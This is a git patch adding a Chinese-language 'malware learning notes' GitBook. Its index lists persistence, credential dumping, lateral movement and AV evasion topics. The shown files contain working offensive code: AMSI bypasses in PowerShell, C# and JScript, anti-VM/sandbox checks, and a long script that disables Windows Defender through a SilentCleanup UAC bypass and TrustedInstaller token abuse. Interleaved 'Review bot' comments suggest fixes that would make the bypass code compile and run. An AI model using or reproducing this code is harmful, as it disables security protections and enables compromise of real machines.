From 2143326028cfd56c5cb19e1f9be0328afc117584 Mon Sep 17 00:00:00 2001 
From: 287182701 <287182701@qq.com> Date: Sun, 16 May 2021 17:08:17 +0000 Subject: [PATCH] GitBook: [main] 92 pages modified --- README.md | 11 + SUMMARY.md | 136 ++ amsi/bypass-amsi.md | 85 + anti-analysis/anti-vm-sandbox.md | 79 + disable-av/disable-wd.md | 129 ++ dump/bsod.md | 6 + dump/comsvcs.dll.md | 8 + dump/dumpert.md | 6 + dump/hibernation.md | 6 + dump/ppldump.md | 6 + dump/procdump.md | 10 + dump/processdump.exe.md | 13 + dump/shellcode.md | 6 + dump/silentprocessexit.md | 6 + dump/sqldumper.md | 17 + dump/task-manager-process-explorer.md | 6 + dump/untitled.md | 180 ++ dump/winpmem.md | 6 + file/chm/README.md | 2 + file/chm/phishing-chm.md | 28 + file/lnk/README.md | 8 + file/lnk/phishing-lnk.md | 19 + file/office.md | 20 + file/pe.md | 8 + get-password/inject-mstsc.exe.md | 6 + get-password/mimikatz.md | 6 + get-password/nplogonnotify.md | 6 + get-password/smb.md | 10 + get-password/tickets.md | 6 + inject/inject.md | 8 + lateral-movement/dcom.md | 2 + lateral-movement/hash.md | 2 + lateral-movement/kerberos-tickets.md | 2 + lateral-movement/rpc.md | 2 + lateral-movement/wmi.md | 2 + persistence/bits-jobs/README.md | 2 + persistence/bits-jobs/bits.md | 18 + persistence/com-hijack/README.md | 2 + persistence/com-hijack/com-hijack.md | 100 + persistence/dll-hijack/README.md | 2 + persistence/dll-hijack/hijack-.net-program.md | 57 + .../dll-hijack/hijack-autorun-programs.md | 1603 +++++++++++++++++ .../image-file-execution-options/README.md | 2 + .../image-file-execution-options.md | 32 + persistence/office/README.md | 2 + persistence/office/com-hijack.md | 23 + .../office/macro-enabled-add-in-file.md | 41 + persistence/office/vsto.md | 8 + persistence/office/wll-xll.md | 28 + persistence/rootkit/README.md | 2 + persistence/rootkit/rootkit.md | 26 + persistence/schtasks/README.md | 2 + persistence/schtasks/add-schtasks.md | 24 + persistence/service/README.md | 2 + persistence/service/edit-service.md | 16 + persistence/service/hide-service.md | 20 + 
persistence/service/hijack-service.md | 12 + persistence/service/new-service.md | 18 + persistence/startup/README.md | 2 + persistence/startup/folder.md | 11 + persistence/startup/registry.md | 78 + persistence/uncatelogued/README.md | 2 + persistence/uncatelogued/addmonitor.md | 34 + .../uncatelogued/appinit-dlls-inject.md | 14 + persistence/uncatelogued/bios.md | 12 + persistence/uncatelogued/command-processor.md | 10 + .../uncatelogued/hijack-update-program.md | 10 + persistence/uncatelogued/laps.md | 12 + .../uncatelogued/powershell-profile.md | 31 + persistence/uncatelogued/replace-file.md | 19 + persistence/uncatelogued/screen-save.md | 20 + persistence/uncatelogued/sdb.md | 10 + persistence/uncatelogued/sethc.exe.md | 15 + persistence/uncatelogued/ssp-dll.md | 10 + persistence/uncatelogued/uwp.md | 25 + persistence/uncatelogued/w32time.md | 205 +++ persistence/uncatelogued/waitfor.md | 19 + persistence/uncatelogued/windows-telemetry.md | 20 + persistence/user/README.md | 2 + persistence/user/add-user.md | 176 ++ persistence/user/hide-user.md | 158 ++ persistence/wmi/README.md | 2 + persistence/wmi/wmi-event.md | 109 ++ privilege-escalation/bug.md | 2 + privilege-escalation/untitled-4.md | 2 + privilege-escalation/wrong-config.md | 2 + process/creat-new-process.md | 12 + rats/hidden-remote.md | 14 + rats/stealer/README.md | 2 + rats/stealer/shu-ru-fa.md | 6 + tips/some-tips.md | 14 + tools/untitled.md | 2 + 92 files changed, 3957 insertions(+) create mode 100644 SUMMARY.md create mode 100644 amsi/bypass-amsi.md create mode 100644 anti-analysis/anti-vm-sandbox.md create mode 100644 disable-av/disable-wd.md create mode 100644 dump/bsod.md create mode 100644 dump/comsvcs.dll.md create mode 100644 dump/dumpert.md create mode 100644 dump/hibernation.md create mode 100644 dump/ppldump.md create mode 100644 dump/procdump.md create mode 100644 dump/processdump.exe.md create mode 100644 dump/shellcode.md create mode 100644 dump/silentprocessexit.md create mode 100644 
dump/sqldumper.md create mode 100644 dump/task-manager-process-explorer.md create mode 100644 dump/untitled.md create mode 100644 dump/winpmem.md create mode 100644 file/chm/README.md create mode 100644 file/chm/phishing-chm.md create mode 100644 file/lnk/README.md create mode 100644 file/lnk/phishing-lnk.md create mode 100644 file/office.md create mode 100644 file/pe.md create mode 100644 get-password/inject-mstsc.exe.md create mode 100644 get-password/mimikatz.md create mode 100644 get-password/nplogonnotify.md create mode 100644 get-password/smb.md create mode 100644 get-password/tickets.md create mode 100644 inject/inject.md create mode 100644 lateral-movement/dcom.md create mode 100644 lateral-movement/hash.md create mode 100644 lateral-movement/kerberos-tickets.md create mode 100644 lateral-movement/rpc.md create mode 100644 lateral-movement/wmi.md create mode 100644 persistence/bits-jobs/README.md create mode 100644 persistence/bits-jobs/bits.md create mode 100644 persistence/com-hijack/README.md create mode 100644 persistence/com-hijack/com-hijack.md create mode 100644 persistence/dll-hijack/README.md create mode 100644 persistence/dll-hijack/hijack-.net-program.md create mode 100644 persistence/dll-hijack/hijack-autorun-programs.md create mode 100644 persistence/image-file-execution-options/README.md create mode 100644 persistence/image-file-execution-options/image-file-execution-options.md create mode 100644 persistence/office/README.md create mode 100644 persistence/office/com-hijack.md create mode 100644 persistence/office/macro-enabled-add-in-file.md create mode 100644 persistence/office/vsto.md create mode 100644 persistence/office/wll-xll.md create mode 100644 persistence/rootkit/README.md create mode 100644 persistence/rootkit/rootkit.md create mode 100644 persistence/schtasks/README.md create mode 100644 persistence/schtasks/add-schtasks.md create mode 100644 persistence/service/README.md create mode 100644 persistence/service/edit-service.md 
create mode 100644 persistence/service/hide-service.md create mode 100644 persistence/service/hijack-service.md create mode 100644 persistence/service/new-service.md create mode 100644 persistence/startup/README.md create mode 100644 persistence/startup/folder.md create mode 100644 persistence/startup/registry.md create mode 100644 persistence/uncatelogued/README.md create mode 100644 persistence/uncatelogued/addmonitor.md create mode 100644 persistence/uncatelogued/appinit-dlls-inject.md create mode 100644 persistence/uncatelogued/bios.md create mode 100644 persistence/uncatelogued/command-processor.md create mode 100644 persistence/uncatelogued/hijack-update-program.md create mode 100644 persistence/uncatelogued/laps.md create mode 100644 persistence/uncatelogued/powershell-profile.md create mode 100644 persistence/uncatelogued/replace-file.md create mode 100644 persistence/uncatelogued/screen-save.md create mode 100644 persistence/uncatelogued/sdb.md create mode 100644 persistence/uncatelogued/sethc.exe.md create mode 100644 persistence/uncatelogued/ssp-dll.md create mode 100644 persistence/uncatelogued/uwp.md create mode 100644 persistence/uncatelogued/w32time.md create mode 100644 persistence/uncatelogued/waitfor.md create mode 100644 persistence/uncatelogued/windows-telemetry.md create mode 100644 persistence/user/README.md create mode 100644 persistence/user/add-user.md create mode 100644 persistence/user/hide-user.md create mode 100644 persistence/wmi/README.md create mode 100644 persistence/wmi/wmi-event.md create mode 100644 privilege-escalation/bug.md create mode 100644 privilege-escalation/untitled-4.md create mode 100644 privilege-escalation/wrong-config.md create mode 100644 process/creat-new-process.md create mode 100644 rats/hidden-remote.md create mode 100644 rats/stealer/README.md create mode 100644 rats/stealer/shu-ru-fa.md create mode 100644 tips/some-tips.md create mode 100644 tools/untitled.md 
diff --git a/README.md b/README.md
index e69de29..4a51392 100644
--- a/README.md
+++ b/README.md
@@ -0,0 +1,11 @@
+# 恶意软件学习笔记
+
+2021年,给自己挖一个新坑。
+
+在这里整理自己学习恶意软件分析以来学到的东西,同时存放一些从各个地方看到的技巧。
+
+希望在新的一年里,能够多多进步。
+
+备注:
+所有示例中,均使用“qwqdanchun”作为可以随意起名的部分,各负载地址均为”C:\Temp\qwqdanchun.\*”。
+
diff --git a/SUMMARY.md b/SUMMARY.md
new file mode 100644
index 0000000..9621e3b
--- /dev/null
+++ b/SUMMARY.md
@@ -0,0 +1,136 @@
+# Table of contents
+
+* [恶意软件学习笔记](README.md)
+
+## 权限维持
+
+* [服务](persistence/service/README.md)
+ * [新建服务](persistence/service/new-service.md)
+ * [修改服务](persistence/service/edit-service.md)
+ * [隐藏服务](persistence/service/hide-service.md)
+ * [劫持服务](persistence/service/hijack-service.md)
+* [启动项](persistence/startup/README.md)
+ * [注册表](persistence/startup/registry.md)
+ * [文件夹](persistence/startup/folder.md)
+* [用户账户](persistence/user/README.md)
+ * [新建用户](persistence/user/add-user.md)
+ * [隐藏用户](persistence/user/hide-user.md)
+* [DLL劫持](persistence/dll-hijack/README.md)
+ * [劫持自启动程序](persistence/dll-hijack/hijack-autorun-programs.md)
+ * [劫持.NET程序](persistence/dll-hijack/hijack-.net-program.md)
+* [COM劫持](persistence/com-hijack/README.md)
+ * [COM劫持](persistence/com-hijack/com-hijack.md)
+* [映像劫持](persistence/image-file-execution-options/README.md)
+ * [映像劫持](persistence/image-file-execution-options/image-file-execution-options.md)
+* [计划任务](persistence/schtasks/README.md)
+ * [新建任务](persistence/schtasks/add-schtasks.md)
+* [WMI](persistence/wmi/README.md)
+ * [WMI事件](persistence/wmi/wmi-event.md)
+* [Office](persistence/office/README.md)
+ * [VSTO](persistence/office/vsto.md)
+ * [WLL/XLL](persistence/office/wll-xll.md)
+ * [模板文件](persistence/office/macro-enabled-add-in-file.md)
+ * [COM劫持](persistence/office/com-hijack.md)
+* [BITS Jobs](persistence/bits-jobs/README.md)
+ * [BITS](persistence/bits-jobs/bits.md)
+* [Rootkit](persistence/rootkit/README.md)
+ * [Rootkit](persistence/rootkit/rootkit.md)
+* [未分类](persistence/uncatelogued/README.md)
+ * [Windows Telemetry](persistence/uncatelogued/windows-telemetry.md)
+ * [替换文件](persistence/uncatelogued/replace-file.md)
+ * [AppInit\_DLLs注入](persistence/uncatelogued/appinit-dlls-inject.md)
+ * [粘滞键](persistence/uncatelogued/sethc.exe.md)
+ * [cmd启动劫持](persistence/uncatelogued/command-processor.md)
+ * [屏幕保护](persistence/uncatelogued/screen-save.md)
+ * [注册SSP 
DLL](persistence/uncatelogued/ssp-dll.md)
+ * [AddMonitor](persistence/uncatelogued/addmonitor.md)
+ * [滥用POWERSHELL配置文件](persistence/uncatelogued/powershell-profile.md)
+ * [W32Time](persistence/uncatelogued/w32time.md)
+ * [UWP](persistence/uncatelogued/uwp.md)
+ * [Waitfor](persistence/uncatelogued/waitfor.md)
+ * [Bios](persistence/uncatelogued/bios.md)
+ * [劫持更新程序](persistence/uncatelogued/hijack-update-program.md)
+ * [利用LAPS](persistence/uncatelogued/laps.md)
+ * [SDB文件](persistence/uncatelogued/sdb.md)
+
+## 提权
+
+* [UAC Bypass](privilege-escalation/untitled-4.md)
+* [漏洞](privilege-escalation/bug.md)
+* [错误配置](privilege-escalation/wrong-config.md)
+
+## 横向移动
+
+* [WMI](lateral-movement/wmi.md)
+* [RPC](lateral-movement/rpc.md)
+* [DCOM](lateral-movement/dcom.md)
+* [HASH](lateral-movement/hash.md)
+* [Kerberos tickets](lateral-movement/kerberos-tickets.md)
+
+## 文件结构
+
+* [Office](file/office.md)
+* [LNK](file/lnk/README.md)
+ * [钓鱼lnk](file/lnk/phishing-lnk.md)
+* [PE](file/pe.md)
+* [CHM](file/chm/README.md)
+ * [钓鱼chm](file/chm/phishing-chm.md)
+
+## 注入
+
+* [注入](inject/inject.md)
+
+## 反分析
+
+* [反虚拟机/沙盒](anti-analysis/anti-vm-sandbox.md)
+
+## 获取用户密码或hash
+
+* [SMB](get-password/smb.md)
+* [注入mstsc.exe](get-password/inject-mstsc.exe.md)
+* [Mimikatz](get-password/mimikatz.md)
+* [NPLogonNotify](get-password/nplogonnotify.md)
+* [Tickets](get-password/tickets.md)
+
+## 进程链
+
+* [启动进程](process/creat-new-process.md)
+
+## 关闭杀软
+
+* [关闭WD](disable-av/disable-wd.md)
+
+## AMSI
+
+* [绕过AMSI](amsi/bypass-amsi.md)
+
+## Dump内存
+
+* [MiniDumpWriteDump](dump/untitled.md)
+* [Shellcode](dump/shellcode.md)
+* [SilentProcessExit](dump/silentprocessexit.md)
+* [procdump](dump/procdump.md)
+* [Task Manager/Process Explorer](dump/task-manager-process-explorer.md)
+* [Sqldumper](dump/sqldumper.md)
+* [comsvcs.dll](dump/comsvcs.dll.md)
+* [WinPmem](dump/winpmem.md)
+* [ProcessDump.exe](dump/processdump.exe.md)
+* [Dumpert](dump/dumpert.md)
+* [BSOD](dump/bsod.md)
+* 
[PPLdump](dump/ppldump.md)
+* [Hibernation](dump/hibernation.md)
+
+## 木马分析
+
+* [Stealer](rats/stealer/README.md)
+ * [输入法](rats/stealer/shu-ru-fa.md)
+* [Hidden Remote](rats/hidden-remote.md)
+
+## 常用工具
+
+* [Untitled](tools/untitled.md)
+
+## 鬼知道有什么用的小知识
+
+* [鬼知道有什么用的小知识](tips/some-tips.md)
+
diff --git a/amsi/bypass-amsi.md b/amsi/bypass-amsi.md
new file mode 100644
index 0000000..a51aec3
--- /dev/null
+++ b/amsi/bypass-amsi.md
@@ -0,0 +1,85 @@
+# 绕过AMSI
+
+Powershell:
+
+```text
+$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+```
+
+c\#:
+
+```csharp
+public class Amsi
+ {
+ public static void Bypass()
+ {
+ string x64 = "uFcA";
+ x64 = x64 + "B4DD";
+ string x86 = "uFcAB4";
+ x86 = x86 + "DCGAA=";
+ if (is64Bit())
+ PatchA(Convert.FromBase64String(x64));
+ else
+ PatchA(Convert.FromBase64String(x86));
+ }
+ private static void PatchA(byte[] patch)
+ {
+ try
+ {
+ string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
+ var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
+ string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
+ var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
+ uint oldProtect;
+ Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
+ Marshal.Copy(patch, 0, addr, patch.Length);
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(" [x] {0}", e.Message);
+ Console.WriteLine(" [x] {0}", e.InnerException);
+ }
+ }
+ private static bool is64Bit()
+ {
+ bool is64Bit = true;
+ if (IntPtr.Size == 4)
+ is64Bit = false;
+ return is64Bit;
+ }
+ }
+ class Win32
+ {
+ public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
+ public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+ #region CreateAPI
+ [DllImport("kernel32", SetLastError = true)]
+ public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
+ public static 
extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ public static CreateApi LoadApi(string name, string method)
+ {
+ return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
+ }
+ #endregion
+ }
+```
+
+js:
+
+```javascript
+var sh=new ActiveXObject('WScript.Shell');
+var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
+try{
+ var AmsiEnable=sh.RegRead(key);
+ if(AmsiEnable!=0) {
+ throw new Error(1,'');
+ }
+} catch(e) {
+ sh.RegWrite(key,0,"REG_DWORD");
+ sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
+ sh.RegWrite(key,1,"REG_DWORD");
+ WScript.Quit(1);
+}
+```
+
diff --git a/anti-analysis/anti-vm-sandbox.md b/anti-analysis/anti-vm-sandbox.md
new file mode 100644
index 0000000..c75797d
--- /dev/null
+++ b/anti-analysis/anti-vm-sandbox.md
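Review bot: The C# listing does not compile as pasted: `LoadApi` returns and casts to a `CreateApi` delegate type that is declared nowhere in the listing, while the only delegate actually declared is `DelegateVirtualProtect`, so the `VirtualAllocEx` field initializer cannot type-check either. That field is bound by `LoadApi` to the base64 string that decodes to `VirtualProtect` (as its trailing comment says), so the name misleads a reader about which API is called; renaming it `VirtualProtect` and having `LoadApi` return `DelegateVirtualProtect` instead of the undeclared `CreateApi` would make the snippet self-contained. Its return value is also discarded, so a failed protection change is followed by `Marshal.Copy` into a page that may still be read-only and is reported only through the generic catch rather than as a VirtualProtect failure; a one-line check on the return before the copy, plus restoring `oldProtect` afterwards, would be the expected shape. For the JScript block it is worth a comment that the script ends by writing `AmsiEnable` to 1 unconditionally, which leaves a durable HKCU artifact even where the value was absent before.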
@@ -0,0 +1,79 @@
+# 反虚拟机/沙盒
+
+c\#\(WMI检测内存\):
+
+```csharp
+using System;
+using System.Management;
+using System.Threading;
+
+namespace Program
+{
+ class Anti_Analysis
+ {
+ public static void RunAntiAnalysis()
+ {
+ if (isVM())
+ {
+ Environment.FailFast(null);
+ }
+ Thread.Sleep(1000);
+ }
+ public static bool isVM()
+ {
+ SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
+ //SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
+ ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
+ int i = 0;
+ foreach (ManagementObject DeviceID in searcher.Get())
+ i++;
+ return (i == 0);
+ }
+ }
+}
+```
+
+c++\(即插即用设备\)
+
+{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
+
+```cpp
+#include
+#include
+#include
+
+int main()
+{
+ DISPLAY_DEVICE dd;
+ dd.cb = sizeof(dd);
+ int deviceIndex = 0;
+ while (EnumDisplayDevices(0, deviceIndex, &dd, 0))
+ {
+ std::wstring deviceName = dd.DeviceName;
+ int monitorIndex = 0;
+ while (EnumDisplayDevices(deviceName.c_str(), monitorIndex, &dd, 0))
+ {
+ int flag = strlen((const char*)dd.DeviceString);
+ if (flag > 2) {
+ std::wcout << "this is vm";
+ }
+ else
+ {
+ std::wcout << "this is not vm";
+ }
+ ++monitorIndex;
+ }
+ ++deviceIndex;
+ }
+ return 0;
+}
+```
+
+{% embed url="https://github.com/a0rtega/pafish" caption="" %}
+
+测试工具:
+
+{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
+
+{% embed url="https://github.com/a0rtega/pafish" caption="" %}
+
diff --git a/disable-av/disable-wd.md b/disable-av/disable-wd.md
new file mode 100644
index 0000000..7159169
--- /dev/null
+++ b/disable-av/disable-wd.md
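Review bot: The three `#include` directives in the C++ listing carry no header name as rendered, so the snippet cannot compile as shown; the angle-bracketed names were presumably stripped on the way into the page, and `DISPLAY_DEVICE`/`EnumDisplayDevices`, `std::wstring` and `std::wcout` point to `<windows.h>`, `<string>` and `<iostream>`, which should be restored with escaped brackets. `strlen((const char*)dd.DeviceString)` measures a `TCHAR` buffer as narrow bytes, so under a Unicode build it stops at the first zero byte of the first wide character and the `flag > 2` test then depends on the build's character set rather than on the device name; a comment such as `// DeviceString is TCHAR: use _tcslen (wcslen under UNICODE), not strlen` would at least mark the assumption. The C# check, zero rows from `Win32_CacheMemory`, and the display-device check are both heuristics rather than proofs of virtualization, and the page would read better if it said so next to each instead of printing "this is vm".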
@@ -0,0 +1,129 @@ +# 关闭WD + +```text +@(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16 || configure just auto-actions OFF; toggle icon on ltsb +set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1] +sp 'HKCU:\Volatile Environment' 'ToggleDefender' @' +if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'} + +## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2) +if ($env:1 -ne 6 -and $env:1 -ne 7) { + $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51) + if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP} +} + +## Without the dialog prompt above will toggle automatically +if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE } + +## Comment to not relaunch systray icon +start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1 + +## Comment to not hide per-user toggle notifications +$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance' +ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0 +sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0} + +## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass? +$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup') +$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition + +## Cascade elevation +$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3} + +## Reload from volatile registry as needed +$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . 
* ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39 +$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer' +$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script + +## 0: limited-user: must runas +if ($u -eq 0) { + start powershell -args $script -verb runas -win 1; break +} + +## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas +if ($u -eq 1) { + if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break} + sp hkcu:\environment windir $('powershell '+$script+' #') + $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1} + if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break +} + +## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610] +if ($u -eq 2) { + $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_, + 1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0) + $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I) + $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4) + 1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size + nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal"); + $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); 
$v=$HG.invoke($null,$Z) + 'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}} + $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1 + $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2])) + $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600 + $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break +} + +## Create registry paths +$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' +' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null} + +## Toggle Defender +if ($env:1 -eq 7) { + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 + sc.exe config windefend depend= RpcSs + net1 start windefend + kill -Force -Name MpCmdRun -ea 0 + start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1 +} else { + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0 + sp 
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 + net1 stop windefend + sc.exe config windefend depend= RpcSs-TOGGLE + kill -Name MpCmdRun -Force -ea 0 + start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1 + del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0 ## Commented = keep scan history + del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0 +} + +## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT +sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0 ## Auto Actions OFF +# rp $wdp DisableRoutinelyTakingAction -Force -ea 0 ## Auto Actions ON [default] +sp $wdp PUAProtection 1 -Type Dword -Force -ea 0 ## Potential Unwanted Apps ON +rp $wdp PUAProtection -Force -ea 0 ## Potential Unwanted Apps OFF [default] +sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0 ## Cloud blocking level HIGH +rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0 ## Cloud blocking level LOW [default] +sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0 ## Cloud protection ADVANCED +rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0 ## Cloud protection BASIC [default] +sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0 ## Sample Submission ALWAYS-PROMPT +rp ($wdp+'\Spynet') SubmitSamplesConsent 
-Force -ea 0 ## Sample Submission AUTOMATIC [default]
+sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0 ## Scan incoming file only
+rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0 ## Scan incoming and outgoing file [default]
+
+## Uncomment to close windows built-in lame uac bpass and/or reset uac
+# if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
+# $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe' ## %windir%\system32\cleanmgr.exe [default]
+# $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null) ## UAC silent bpass mitigation
+# $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
+# sp $uac EnableLUA 1 -Type Dword -Force -ea 0 ## UAC enable
+# sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0 ## UAC always notify - bpassable otherwise
+# sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0 ## UAC secure - prevent automation
+# }
+
